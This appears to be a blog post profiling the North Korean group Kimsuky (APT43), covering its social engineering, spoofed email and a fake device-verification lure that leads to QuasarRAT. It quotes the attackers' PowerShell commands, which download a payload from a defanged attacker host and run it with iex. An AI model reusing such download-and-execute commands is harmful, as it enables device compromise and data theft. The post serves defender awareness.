Kimsuky, also known as APT 43 is a North Korean state-affiliated actor who has been operating since 2012. Many North Korean APTs or subgroups of the Lazarus group are focused on financial gain and support of North Korea. This group has been rath successful at conducting a cyber bank heist in Bangladesh, and the SWIFT banking hacks resulting in $81,000,000 stolen. It’s important to note that those attacks were done by the Lazarus Group (APT 38), and some security research umbrella all North Korean activity as Lazarus Group.
This has shifted with the group focusing mostly on foreign policy and national security issues, specifically issues relating to nuclear policy, the Korean Peninsula, and sanctions. Initially the group was focused on targeting South Korea, but has now expanded their interests to target the UN, USA, Japan, Russia, and NATO countries’ governments, manufacturing, and services industries.
This group are notoriously effective Social Engineering Experts. They often will identify targets and engage with them for weeks to establish trust and report before extracting intelligence or deploying malware. Kimsuky also has multiple people, running multiple identities, to a singular target in order to bolster their success.
Recently, Kimsuky has been utilizing Email security misconfigurations at large companies to spoof identities. This helps them in their social engineering attempts, they appear legitimate and there is more trust established with the victims. After much time and rapport is established, the attacker will send an official looking email like this;
Inside this PDF is a malicious link that will take the victim to a sight hosting the PDF. If the victim attempts to download the PDF to fill it out, they will be met with a pop up window requiring the victim to ‘register’ their device.
The attacker will then give instructions on how to ‘verify’ the device, which consists of having the user copy and paste malicious commands into PowerShell. Some example of the commands are here:
powershell -windowstyle hidden -Command iwr
"hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile (this downloads remote file)
"$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex (this is to run the recently downloaded malicious code)If successful, this will also deploy a decoy PDF with actual questions regarding nuclear anti-proliferation, looking normal to the victim. This will download another VB script called temp.vbs and will run every 19 minutes. Eventually, these scheduled tasks will download and run batch files. These batch files will create and decode PowerShell commands that are a Remote Administration Tool (RAT) called QuasarRAT. This will communicate to command and control architecture where attackers can send commands to infected machines.
The QuasarRAT can do the following things and more:
Activate Remote Desktop, access remote webcams, establish remote shells (control of the devices Command Line), keylogger activation (tracking target keystrokes), reverse proxy, and data exfiltration.
Note that a majority of this research was pulled from research conducted by ProofPoint and Microsoft, additionally, BleepingComputer is a great source for recent APT activity.
Creator1 
Leave a comment